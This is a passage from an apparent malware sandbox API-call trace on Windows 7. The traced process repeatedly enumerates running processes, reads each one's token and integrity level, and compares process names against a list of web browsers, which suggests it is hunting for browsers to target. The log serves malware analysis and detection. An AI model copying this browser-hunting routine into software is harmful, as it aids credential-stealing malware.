[3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0504.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0504.657] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x377d68, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">±") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0504.657] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0504.657] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0504.657] GetLastError () returned 0x7a [0504.657] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0504.657] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0504.657] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0504.657] CloseHandle (hObject=0x3bc) returned 1 [0504.657] CloseHandle (hObject=0x5a4) returned 1 [0504.657] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0504.657] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0504.658] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0504.658] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0504.658] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0504.658] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0504.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0504.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0504.658] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0504.658] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0504.658] GetLastError () returned 0x7a [0504.658] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0504.658] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0504.658] CloseHandle (hObject=0x3bc) returned 1 [0504.658] CloseHandle (hObject=0x5a4) returned 1 [0504.658] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0504.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0504.658] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375aa0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">²") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0504.658] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0504.658] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0504.658] GetLastError () returned 0x7a [0504.658] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0504.658] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0504.658] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0504.658] CloseHandle (hObject=0x3bc) returned 1 [0504.658] CloseHandle (hObject=0x5a4) returned 1 [0504.658] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0504.658] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0504.658] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0504.658] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0504.658] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0504.658] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0504.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0504.658] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0504.658] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0504.658] GetLastError () returned 0x7a [0504.658] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0504.658] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0504.658] CloseHandle (hObject=0x3bc) returned 1 [0504.658] CloseHandle (hObject=0x5a4) returned 1 [0504.658] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0504.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0504.659] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376260, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">³") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0504.659] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0504.659] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0504.659] GetLastError () returned 0x7a [0504.659] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0504.659] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0504.659] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0504.659] CloseHandle (hObject=0x3bc) returned 1 [0504.659] CloseHandle (hObject=0x5a4) returned 1 [0504.659] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0504.659] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0504.659] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0504.659] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0504.659] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0504.659] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0504.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0504.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0504.659] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0504.659] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0504.659] GetLastError () returned 0x7a [0504.659] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0504.659] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0504.659] CloseHandle (hObject=0x3bc) returned 1 [0504.659] CloseHandle (hObject=0x5a4) returned 1 [0504.659] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0504.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0504.659] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3768a8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">´") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0504.659] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0504.659] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0504.659] GetLastError () returned 0x7a [0504.659] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0504.659] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0504.659] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0504.659] CloseHandle (hObject=0x3bc) returned 1 [0504.659] CloseHandle (hObject=0x5a4) returned 1 [0504.659] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0504.659] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0504.660] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0504.660] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0504.660] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0504.660] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0504.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0504.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0504.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0504.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0504.660] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0504.660] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0504.660] GetLastError () returned 0x7a [0504.660] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0504.660] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0504.660] CloseHandle (hObject=0x3bc) returned 1 [0504.660] CloseHandle (hObject=0x5a4) returned 1 [0504.660] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0504.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0504.660] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376c50, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">µ") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0504.660] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0504.660] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0504.660] GetLastError () returned 0x7a [0504.660] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0504.660] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0504.660] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0504.660] CloseHandle (hObject=0x3bc) returned 1 [0504.660] CloseHandle (hObject=0x5a4) returned 1 [0504.660] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0504.660] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0504.660] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0504.660] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0504.660] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0504.660] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0504.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0504.660] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0504.661] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0506.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa2e8) returned 0xc0000004 [0506.667] VirtualAlloc (lpAddress=0x0, dwSize=0xb2e8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0506.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb2e8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0506.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0506.668] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0506.668] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0506.668] GetLastError () returned 0x7a [0506.668] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0506.668] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0506.668] CloseHandle (hObject=0x3bc) returned 1 [0506.668] CloseHandle (hObject=0x5a4) returned 1 [0506.669] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0506.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0506.669] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x377d68, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">¶") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0506.669] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0506.669] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0506.669] GetLastError () returned 0x7a [0506.669] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0506.669] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0506.669] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0506.669] CloseHandle (hObject=0x3bc) returned 1 [0506.669] CloseHandle (hObject=0x5a4) returned 1 [0506.669] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0506.669] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0506.669] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0506.669] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0506.669] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0506.669] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0506.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0506.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0506.669] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0506.669] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0506.669] GetLastError () returned 0x7a [0506.669] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0506.669] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0506.669] CloseHandle (hObject=0x3bc) returned 1 [0506.669] CloseHandle (hObject=0x5a4) returned 1 [0506.669] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0506.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0506.669] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375a60, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">·") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0506.669] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0506.669] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0506.669] GetLastError () returned 0x7a [0506.669] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0506.669] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0506.669] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0506.669] CloseHandle (hObject=0x3bc) returned 1 [0506.670] CloseHandle (hObject=0x5a4) returned 1 [0506.670] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0506.670] 